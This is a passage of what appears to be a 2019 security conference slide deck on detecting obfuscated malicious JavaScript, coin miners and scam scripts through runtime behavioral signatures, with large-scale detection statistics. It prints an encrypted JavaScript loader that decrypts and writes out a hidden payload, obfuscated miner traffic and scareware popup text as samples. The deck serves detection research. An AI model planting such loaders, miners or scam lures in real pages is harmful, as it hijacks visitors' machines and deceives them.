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 GxOB6PGs='; var output = Aes.Ctr.decrypt(hea2t, hea2p, 256); document.write(output)
  • 8. Websocket Signatures: Detecting Unauthorized Miners Stratum Protocol Messages Request: { "type": "submit", "params": { "version": 7, "job_id": "871932594873942", "nonce": "8a462f80", "result": "7516e7...de4df27f300" } } Response: { "type": "hash_accepted", "params": { "hashes": 256 } } 8 | WTMC 2019 Obfuscated CoinImp Messages Request: suu9sLms6/PruryrpKC96+Xruai7qKS66/Oy66e mp6qs6/Prqvqqr//+//jr5eu7rLq8pb3r8+us// itqP2v8f//+6+tqKj5q/n7qPz48PuvqP//qK/++ Pz8+PD9+6z8+6r8/qqv8f6o/qiv8fzx/f//+v77 +fn56+Xro6arlqCt6/Pr+v/5+v/x/vD4+P7/+fn /67S0 Response: suu9sLms6/Pp66Omq+vl6eu5qLuopLrr8+my66u lpqvr8+nr+fD58Kr68Pzw/6z5+fzx8Pr4/KusqP H6+Kr4rKj6+aiqq63xqPiorPv8qPqo8P77qP/// K36qv7x/auqr/DxqPv68PD9+aut+a+s8fGv+fn5 +fn5+fn9qq2s/fuqr/2orf+r8az4//+sraiqqv7 88Putq/D7/vn/qqz8+quorfz7qPGo+fHxr/Go/P v4raj7/Kiv8az/+fvr5enro6arlqCt6/Pp6/r/+ fr/8f7w+Pj+//n5/+vl6eu9qLuurL3r8+nr+a3+ /a2o+fnr5enrvqCt6/Pp+Pu0tA== (despite the several layers of obfuscation)
  • 9. JavaScript Popups and Alerts (and related API calls) 9 | WTMC 2019 • “WARNING! Your official Adobe Flash Player version is out of date. Please install latest software update to continue. Please click "Update" to continue.” • "IMMEDIATELY CALL APPLE CARE" • "Congratulations Amazon user!" • "Microsoft Excel, Click "OK" below to view your file online instead" Inercepted APIs: window.alert, window.prompt, window.confirm, window.onbeforeunload
  • 11. Production Pipeline & Data Collection We measure how behavioral signatures can improve a state-of-the-art commercial URL categorization service • Crawling data • Daily feed of "unknown" URLs visited by Palo Alto Networks customers (i.e. more than 10M URLs per day) • Reporting results for November 2018 • Crawling infrastructure • Existing security scanner based on Headless Chrome Browser • Added with collecting global variables, intercepting JavaScript alerts, and recording WebSocket handshakes/messages • 250 unique signatures for detection • Collected semi-automatically by retrieving dynamic artifacts from VirusTotal URLs • Attributing 23 coin-mining libraries 11 | WTMC 2019
  • 12. RESULT HIGHLIGTS Overall detection results • 9,104 coin-mining scripts over 8,712 distinct URLs • 4,788 other malicious JavaScripts over 4,633 distinct URLs Real user impact (if blocked) • Over 1M requests towards coin-mining websites • Over 243K towards scams/scareware/phishing pages 12 | WTMC 2019
  • 14. Daily Detection Rate of Coin-mining URLs 14 | WTMC 2019 • 1,097 coin-mining URLs on average per day • Only 180 previously unseen URLs daily! • 69.1% of detected URLs perform “unauthorized” successful coin mining • 1,414 out of 4,264 Coinhive scripts were obfuscated and undetected by static matching
  • 15. Top Coin Miners Observed during Study 15 | WTMC 2019 Unauthorized mining: • CoinImp (100% / 612 JS) • Crypto-Loot (86% / 906 JS) • Coinhive (77.7% / 3,312 JS) • Unidentified Stratum
  • 16. Malicious Operators Rotate or Even Use Several Miners 16 | WTMC 2019 9,104 script detected over 8,712 URLs!
  • 18. Daily Detection Rate of Coin-mining URLs 18 | WTMC 2019 • 184 malicious URLs per day, including 143 URLs unseen previously • URLs hosting non-mining JS malware are less likely to be observed for many days in a row!
  • 19. Top Recently Observed Non-Mining Malicious JavaScripts 19 | WTMC 2019 Our signatures capture many scam-related scripts!
  • 21. Using Passive DNS to Measure Popularity & Lifetime 21 | WTMC 2019 • 8,712 detected coin-mining URLs resolve to 7,654 distinct domains • 4,633 URLs with other malicious scripts resolve to 2,666 domains • Two visual clusters: • Coin-mining domains receive tens of millions DNS resolutions and can live for more than 4 year • Non-mining malicious domains are usually alive for less than 100 days and receive less than 10K DNS resolutions seriesfree.to vs. win32-0x2ndt-firewall-error.gq
  • 22. Popularity Analysis Using Alexa rankings 22 | WTMC 2019 • 66.9% of coin-mining domains were observed in Alexa’s top 1M • 16,9% remained in the top 1M during the whole month • 37 domains in the first 10K • 932 mining immediately • In contrast, only 71 from non- mining malicious JavaScript domains were found in Alexa’s top 1M
  • 23. Analysis of TLDs among Detected Malicious Websites Coin-mining websites Non-mining websites TLD # Domains # Domains # Domains com 3,487 icu 1,299 ir 394 com 409 net 337 club 290 ru 319 xyz 83 org 285 tk 71 23 | WTMC 2019 • In November 2018, the .icu TLD was abused the most to distribute different kinds of scam • Coin-miners tend to reside on generally more expensive (and reputable) .com, which matches our previous findings
  • 24. Country origin of IPs serving malicious JavaScript 24 | WTMC 2019 Coin miners Other malicious JS Coin-mining websites cover more countries!
  • 25. CONCLUSION & FURTURE WORK • We presented several examples of lightweight dynamic techniques to detect obfuscated malicious JavaScript using behavioral signatures • On a large scale and detecting modern malicious campaigns • Extending and generalizing the method: • More “runtime-code-representation” signatures (such as, types and values of variables, local variables, custom implementation of alerts, eval code, etc.) • Automated retrieval of behavioral signature (using clustering and benign scores) • Using behavioral signatures as features for ML detection models • Using behavioral signatures for attribution of malicious campaigns 25 | WTMC 2019